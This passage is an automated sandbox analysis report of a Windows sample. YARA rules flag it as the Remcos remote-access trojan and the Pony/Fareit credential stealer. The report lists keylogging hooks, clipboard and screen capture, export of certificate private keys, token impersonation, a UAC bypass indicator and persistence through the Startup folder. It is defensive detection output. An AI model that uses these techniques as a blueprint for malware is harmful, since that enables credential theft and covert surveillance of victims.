                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [F1] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Del] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_00404643 SetWindowsHookExA 0000000D,00404628,00000000,00000000 11_2_00404643
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040C5BF ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,OpenClipboard,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C5BF
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040E25E EmptyClipboard,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,GlobalAlloc,GlobalLock,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040E25E
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040F0DF Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040F0DF
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040469B GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,11_2_0040469B

                    E-Banking Fraud

                    Source: Yara match File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Source: Yara match File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_00411F9F ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,11_2_00411F9F

                    System Summary

                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Fareit Payload Author: kevoreilly
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR | Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SGS.exe PID: 6656, type: MEMORYSTR | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
                    Source: Signatures Results: All Signatures
                    Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 9_2_0019F91C NtUnmapViewOfSection | 9_2_0019F91C
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040E14C ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ | 11_2_0040E14C
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0222B2E5 | 0_2_0222B2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 2_2_0218B2E5 | 2_2_0218B2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_004121E9 | 5_2_004121E9
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00402EFD | 5_2_00402EFD
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 10_2_01FEB2E5 | 10_2_01FEB2E5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: String function: 00404351 appears 51 times
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: String function: 00401D71 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: String function: 00410808 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: String function: 0041282A appears 41 times
                    Source: file.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: scan[1].exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: SGS.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: file.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000000.2050062927.000000000046F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000003.2141671886.0000000004861000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000000.00000002.2142430073.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000009.00000002.2306718875.0000000000944000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepexplorer.ex vs file.exe
                    Source: file.exe, 00000009.00000003.2285813255.00000000046A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe, 00000009.00000003.2304232651.000000000091F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepexplorer.ex vs file.exe
                    Source: file.exe, 00000009.00000003.2304232651.00000000008A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe.0.dr | Binary or memory string: OriginalFilenamepexplorer.exe8 vs file.exe
                    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
                    Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR | Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
                    Source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SGS.exe PID: 6656, type: MEMORYSTR | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
                    Source: classification engine | Classification label: mal100.rans.troj.adwa.spyw.evad.winEXE@23/8@3/2
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore | 5_2_0040D3BE
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle | 5_2_00402968
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040E7DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError | 11_2_0040E7DF
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle | 5_2_00402CE7
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Code function: 5_2_0040A875 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree | 5_2_0040A875
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040937B FindResourceA,LoadResource,LockResource,SizeofResource | 11_2_0040937B
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00410C16 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ | 11_2_00410C16
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-XVE2ON
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: SGS.exe, 00000005.00000003.2179937676.000000000073B000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334695453.0000000000675000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334800606.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: file.exe | ReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe | Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
